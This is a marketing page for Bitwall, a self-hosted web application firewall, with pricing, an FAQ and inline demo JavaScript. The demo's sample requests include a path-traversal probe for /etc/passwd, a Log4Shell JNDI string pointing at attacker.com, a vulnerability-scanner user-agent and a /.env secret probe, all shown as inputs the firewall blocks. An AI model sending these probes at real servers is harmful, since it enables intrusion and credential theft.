How it works Detection Live demo Pricing Scientra ↗
Web Application Firewall · Self-hosted by Scientra

The firewall that ships
with your website.

Bitwall inspects every request before it reaches your app, blocking injection, scanners, brute-force and bots, and reports it all to one live dashboard. One engine, every site.

bitwall · request inspector live
20+
Attack classes
2
Integration paths
0
Cookies · fully passive
100%
Self-hosted · your data
// HOW IT WORKS

One detection engine. Two ways in.

Every Scientra site, static or dynamic, is protected by the same engine and reports to the same dashboard, so the rules are identical everywhere.

Edge · every site, zero app changes

Edge agent

The web server asks Bitwall about every request before serving it. The agent inspects the URL, query, headers, user-agent and client IP, applies rate-limits and bans, then answers allow or deny. Static sites get covered automatically.

  • Runs as an nginx auth-request check
  • No code changes to the protected site
  • Blocks before the request ever reaches you
In-app · dynamic apps

Native middleware

Django and FastAPI apps add one middleware line. Because it runs inside the app it also inspects request bodies, the POST JSON and form data an edge check can never see, so login and checkout flows are fully covered.

  • Deep request-body inspection (JSON & forms)
  • Credential-stuffing & brute-force defense
  • Same engine, same rules, in-process
architecture
Internet ── requests ──▶ scientra-nginx │ (auth_request) static sites ────────────┤───────────── dynamic app (main, eldar, greph…) │ (Django / FastAPI) ▼ │ bitwall-agent native middleware /inspect (body inspection) │ │ └──── events ─────────┘ ▼ bitwall-backend event store · bans · IP intel ▼ bitwall.scientra.one (dashboard)
// DETECTION COVERAGE

It knows what an attack looks like.

Bitwall normalizes the URL, query, headers, cookies and body, decodes common evasion tricks, then matches against signatures and stateful rules. A short list of what it catches:

SQL injectionCross-site scripting (XSS)Path traversalCommand injectionRemote code executionFile inclusion (LFI/RFI)SSRFXXETemplate injection (SSTI)DeserializationNoSQL / LDAP injectionLog4Shell (JNDI)HTTP request smugglingHost-header injectionCRLF / response splittingOpen redirectMalicious file uploadDirectory / secret enumerationScanner user-agentsCredential stuffingHTTP flood / DDoSRequest-burst rate limits

Signature engine

Curated rules for 20+ attack classes, with anti-evasion normalization (HTML-entity, unicode, comment-stripping) so encoded payloads match too.

Stateful protection

Rate limiting, HTTP-flood and DDoS tiers, endpoint-spray detection, and automatic IP bans after repeated high-severity strikes.

IP intelligence

Live geo, ASN, VPN/hosting and abuse-reputation enrichment on every attacker IP, folded into a 0–100 risk score.

Device fingerprinting

Passive device fingerprint from request headers, no cookies or JavaScript, ties a VPN IP back to its real one and bans the device, not just the address.

Bot & VPN detection

Flags automation tools, no-UA clients and spoofed browsers, and marks traffic arriving through VPNs and data-center ranges.

Forensic logging

Every event keeps the redacted request, matched rule and evidence, so you can replay exactly what an attacker tried, with secrets masked.

// HANDS-ON DEMO

Attack it yourself. Safely.

This runs Bitwall's real detection logic right here in your browser, nothing is sent anywhere. Fire a sample attack, or write your own raw request, and watch the verdict.

request inspector
Pick a request to send at your site
Bitwall verdict
Send a request to see how Bitwall responds.
// THE DASHBOARD

One screen for the whole fleet.

Every blocked request, every attacker, every site, in one login-protected dashboard, reachable only through a secure tunnel, never the public internet.

bitwall.scientra.one — operator dashboard
18,204
Requests today
2,391
Blocked
47
Banned IPs
6
Sites protected
Mode: BLOCKING · central control, all sites
Live traffic
🇷🇺45.83.__.__VPNBlocksqli_001
🇨🇳223.104.__.__BOTBlockscanner_ua
🇺🇸3.220.__.__Blockpath_traversal
🇩🇪88.198.__.__BOTBlocklog4shell_001
🇦🇿85.132.__.__allowed

Click any IP

Opens a full dossier: risk gauge, geo, ASN, abuse reputation, the devices behind it and every request it made.

Ban the device

One click bans the IP, its fingerprint and every linked address, so a new VPN IP won't help the attacker.

Central control

Flip between monitor and block for the whole fleet, agents pick it up within seconds.

Replay any request

See exactly what was sent, method, path, body, matched rule and evidence, with passwords and tokens masked.

// PRICING

Simple protection, priced for real businesses.

A one-time setup fee, then a flat monthly rate, managed by Scientra. No per-request billing, no surprises. Prices in Azerbaijani manat.

Essential

For brochure & static sites that just need the front door locked.

29/ month
Setup 99 one-time
Choose Essential
  • Edge WAF for 1 static site
  • 20+ attack-class signature detection
  • Rate limiting & automatic IP bans
  • Security response headers
  • Monthly security summary
  • Request-body inspection
  • Live dashboard access
Most popular

Pro

For dynamic apps, logins and e-commerce that handle real user data.

59/ month
Setup 199 one-time
Choose Pro
  • Everything in Essential, for 1 dynamic site
  • Deep request-body inspection (JSON & forms)
  • Credential-stuffing & brute-force defense
  • IP intelligence (geo · VPN · abuse score)
  • Device-fingerprint bans, bot & VPN detection
  • Live dashboard access
  • Priority WhatsApp support

Business

For multiple sites, higher traffic and custom rules under one roof.

119/ month
Setup 399 one-time
Choose Business
  • Everything in Pro, up to 5 sites
  • Custom detection rules for your app
  • Forensic request logging & retention
  • Incident response when something hits
  • Quarterly threat review with Scientra
  • Uptime & response SLA

Already have a site built by Scientra? Setup is waived on any annual plan. Higher traffic or a custom setup? Talk to us →

// UNDER THE HOOD

For the people who read the docs.

Bitwall is built by security engineers, not resold. Here's the honest technical shape of it.

Self-hosted, your data

Runs on your own server in Docker, never a third-party cloud. Events live in a local store you control. Nothing about your visitors leaves your infrastructure.

Framework-agnostic core

One installable engine with adapters for FastAPI (BitwallMiddleware) and Django (BitwallDjangoMiddleware), plus a standalone edge agent for the nginx auth_request path.

Passive & privacy-first

Fingerprinting uses only request headers, no cookies, no JavaScript, no canvas tricks. That means no consent banner burden and no privacy trade-off for GDPR-minded businesses.

Anti-evasion by default

Payloads are HTML-entity, unicode and comment-decoded before matching, and form bodies are properly plus-decoded, so tricks that slip past naive filters still get caught.

Central control plane

Agents and middleware poll a central config every few seconds, so a ban or a mode switch made in the dashboard propagates to every protected site fleet-wide.

Non-invasive deploy

Bitwall installs alongside your stack without rewriting it, one added service and a few nginx lines. If Bitwall ever stops, your site keeps serving.

// FAQ

Questions, answered.

No noticeable impact. The edge check is a lightweight local lookup and the middleware runs in-process. Static sites are served exactly as fast as before.

Every plan starts in monitor mode so we can tune it against your real traffic before switching to blocking. False positives are visible in the dashboard and one click un-bans anyone. The rules are tested against realistic content to avoid flagging things like "Levi's" or "90's".

For static and most sites, no, protection is at the edge. Dynamic apps add a single middleware line for deep body inspection. We handle the whole setup for you.

No. Bitwall is self-hosted, so your visitor data never touches a third party, and it's managed hands-on by the same team that built your site, with local support in Azerbaijani, Russian and English. You own it.

Yes, Pro and Business plans get dashboard access. It's login-protected and reachable only through a secure tunnel, never exposed to the public internet.

Installation on your server, integration with your site, a monitor-mode tuning period against your live traffic, and switching to full blocking once it's dialled in. It's waived on annual plans for existing Scientra clients.

Ready when you are

Put a wall in front of your site.

Tell us which site to protect and we'll have Bitwall watching it, in monitor mode first, within days.

', ru: '', az: '' }, req: { method: 'POST', path: '/comment', ua: 'Mozilla/5.0', body: 'text=' } }, { em: '📂', key: 'trav', label: { en: 'Path traversal', ru: 'Обход каталога', az: 'Kataloq keçidi' }, desc: { en: '/download?f=../../etc/passwd', ru: '/download?f=../../etc/passwd', az: '/download?f=../../etc/passwd' }, req: { method: 'GET', path: '/download?file=../../../../etc/passwd', ua: 'Mozilla/5.0', body: '' } }, { em: '🔥', key: 'log4', label: { en: 'Log4Shell probe', ru: 'Проба Log4Shell', az: 'Log4Shell yoxlaması' }, desc: { en: '${jndi:ldap://evil}', ru: '${jndi:ldap://evil}', az: '${jndi:ldap://evil}' }, req: { method: 'GET', path: '/', ua: '${jndi:ldap://attacker.com/a}', body: '' } }, { em: '🤖', key: 'scan', label: { en: 'Vulnerability scanner', ru: 'Сканер уязвимостей', az: 'Zəiflik skaneri' }, desc: { en: 'User-Agent: nuclei', ru: 'User-Agent: nuclei', az: 'User-Agent: nuclei' }, req: { method: 'GET', path: '/admin', ua: 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)', body: '' } }, { em: '🕵️', key: 'env', label: { en: 'Secret file probing', ru: 'Поиск секретных файлов', az: 'Sirli fayl axtarışı' }, desc: { en: 'GET /.env', ru: 'GET /.env', az: 'GET /.env' }, req: { method: 'GET', path: '/.env', ua: 'python-requests/2.31', body: '' } } ]; function labelFor(s) { var l = window.BW_LANG ? window.BW_LANG() : 'en'; return { label: s.label[l] || s.label.en, desc: s.desc[l] || s.desc.en }; } function buildSamples() { var wrap = document.getElementById('attackBtns'); if (!wrap) return; wrap.innerHTML = SAMPLES.map(function (s, i) { var lf = labelFor(s); return ''; }).join(''); wrap.querySelectorAll('[data-sample]').forEach(function (b) { b.addEventListener('click', function () { var s = SAMPLES[+b.getAttribute('data-sample')]; render(s.req, inspect(s.req)); }); }); } buildSamples(); // rebuild sample labels on language switch document.querySelectorAll('.lang button').forEach(function (b) { b.addEventListener('click', function () { setTimeout(buildSamples, 160); }); }); // tab switching document.querySelectorAll('[data-demo-tab]').forEach(function (b) { b.addEventListener('click', function () { var tab = b.getAttribute('data-demo-tab'); document.querySelectorAll('[data-demo-tab]').forEach(function (x) { x.classList.toggle('active', x === b); }); document.querySelectorAll('[data-demo-panel]').forEach(function (p) { p.hidden = p.getAttribute('data-demo-panel') !== tab; }); }); }); // raw inspect var rqBtn = document.getElementById('rqInspect'); rqBtn && rqBtn.addEventListener('click', function () { var req = { method: document.getElementById('rqMethod').value, path: document.getElementById('rqPath').value, ua: document.getElementById('rqUA').value, body: document.getElementById('rqBody').value }; render(req, inspect(req)); }); })(); /* ==================== contact wizard (same flow as scientra main) ==================== */ (function () { var WHATSAPP = '994557551115'; var wizard = document.getElementById('wizard'); var confirmBox = document.getElementById('wizardConfirm'); if (!wizard) return; var state = { step: 1, service: null, budget: null, selections: {} }; var closeTimeout; function goto(step) { state.step = step; wizard.querySelectorAll('.step-panel').forEach(function (p) { var on = p.getAttribute('data-panel') === String(step); p.classList.toggle('active', on); if (on) { p.style.animation = 'none'; void p.offsetHeight; p.style.animation = 'fadeUp .35s ease'; } }); wizard.querySelectorAll('.progress .seg').forEach(function (s) { var n = parseInt(s.getAttribute('data-seg'), 10); s.classList.toggle('active', typeof step === 'number' && n <= step); }); } function selectOpt(panelNum, value) { var panel = wizard.querySelector('.step-panel[data-panel="' + panelNum + '"]'); if (!panel) return; var match = null; panel.querySelectorAll('.opt').forEach(function (o) { var hit = o.getAttribute('data-value') === value; o.classList.toggle('selected', hit); if (hit) match = o; }); if (!match) return; state.selections[panelNum] = value; if (panelNum === '1') state.service = value; if (panelNum === '2') state.budget = value; var nextBtn = panel.querySelector('[data-next]'); if (nextBtn) nextBtn.disabled = false; } function openWizard(plan) { clearTimeout(closeTimeout); wizard.classList.add('open'); wizard.setAttribute('aria-hidden', 'false'); document.body.style.overflow = 'hidden'; if (plan) selectOpt('2', plan); goto(1); } function closeWizard() { hideConfirm(); wizard.classList.remove('open'); wizard.setAttribute('aria-hidden', 'true'); document.body.style.overflow = ''; closeTimeout = setTimeout(resetWizard, 400); } function hasProgress() { var n = document.getElementById('w-name'); return !!(state.service || state.budget || (n && n.value.trim().length > 0)); } function openConfirm() { if (!confirmBox) { closeWizard(); return; } confirmBox.classList.add('open'); confirmBox.setAttribute('aria-hidden', 'false'); } function hideConfirm() { if (!confirmBox) return; confirmBox.classList.remove('open'); confirmBox.setAttribute('aria-hidden', 'true'); } function requestClose() { if (state.step === 'done' || !hasProgress()) { closeWizard(); return; } openConfirm(); } function resetWizard() { state = { step: 1, service: null, budget: null, selections: {} }; wizard.querySelectorAll('.opt.selected').forEach(function (o) { o.classList.remove('selected'); }); wizard.querySelectorAll('[data-next]').forEach(function (b) { b.disabled = true; }); var nameEl = document.getElementById('w-name'), siteEl = document.getElementById('w-site'); if (nameEl) nameEl.value = ''; if (siteEl) siteEl.value = ''; var submitBtn = wizard.querySelector('[data-submit]'); if (submitBtn) submitBtn.disabled = true; goto(1); } document.querySelectorAll('[data-open-chat]').forEach(function (b) { b.addEventListener('click', function (e) { e.preventDefault(); openWizard(b.getAttribute('data-plan')); }); }); document.querySelectorAll('[data-close-chat]').forEach(function (b) { b.addEventListener('click', function (e) { e.preventDefault(); requestClose(); }); }); document.addEventListener('keydown', function (e) { if (e.key !== 'Escape' || !wizard.classList.contains('open')) return; if (confirmBox && confirmBox.classList.contains('open')) hideConfirm(); else requestClose(); }); if (confirmBox) { var stayBtn = confirmBox.querySelector('[data-confirm-stay]'); var leaveBtn = confirmBox.querySelector('[data-confirm-leave]'); if (stayBtn) stayBtn.addEventListener('click', hideConfirm); if (leaveBtn) leaveBtn.addEventListener('click', function () { hideConfirm(); closeWizard(); }); confirmBox.addEventListener('click', function (e) { if (e.target === confirmBox) hideConfirm(); }); } wizard.querySelectorAll('.opt-list[data-single]').forEach(function (list) { list.querySelectorAll('.opt').forEach(function (opt) { opt.addEventListener('click', function () { var panel = opt.closest('.step-panel'); selectOpt(panel.getAttribute('data-panel'), opt.getAttribute('data-value')); }); }); }); wizard.querySelectorAll('[data-next]').forEach(function (btn) { btn.addEventListener('click', function () { var currentPanel = wizard.querySelector('.step-panel[data-panel="' + state.step + '"]'); if (!currentPanel) return; var panelNum = currentPanel.getAttribute('data-panel'); if ((panelNum === '1' || panelNum === '2') && !state.selections[panelNum]) { btn.disabled = true; return; } goto(state.step + 1); }); }); wizard.querySelectorAll('[data-back]').forEach(function (btn) { btn.addEventListener('click', function () { if (state.step > 1) goto(state.step - 1); }); }); var nameEl = document.getElementById('w-name'), submitBtn = wizard.querySelector('[data-submit]'); function validate3() { if (submitBtn) submitBtn.disabled = !(nameEl && nameEl.value.trim().length > 1); } if (nameEl) nameEl.addEventListener('input', validate3); if (submitBtn) { submitBtn.addEventListener('click', function () { if (!(nameEl && nameEl.value.trim().length > 1)) return; var siteEl = document.getElementById('w-site'); var siteVal = siteEl && siteEl.value.trim(); var tmpl = (window.BW_T && window.BW_T('wa.msg')) || "Hi Scientra! I'm {name} and I want Bitwall to protect {target}. Plan: {plan}. {site}Let's set it up!"; var msg = tmpl .replace('{name}', nameEl.value.trim()) .replace('{target}', state.service || '-') .replace('{plan}', state.budget || '-') .replace('{site}', siteVal ? (siteVal + '. ') : ''); window.open('https://wa.me/' + WHATSAPP + '?text=' + encodeURIComponent(msg), '_blank'); goto('done'); }); } })();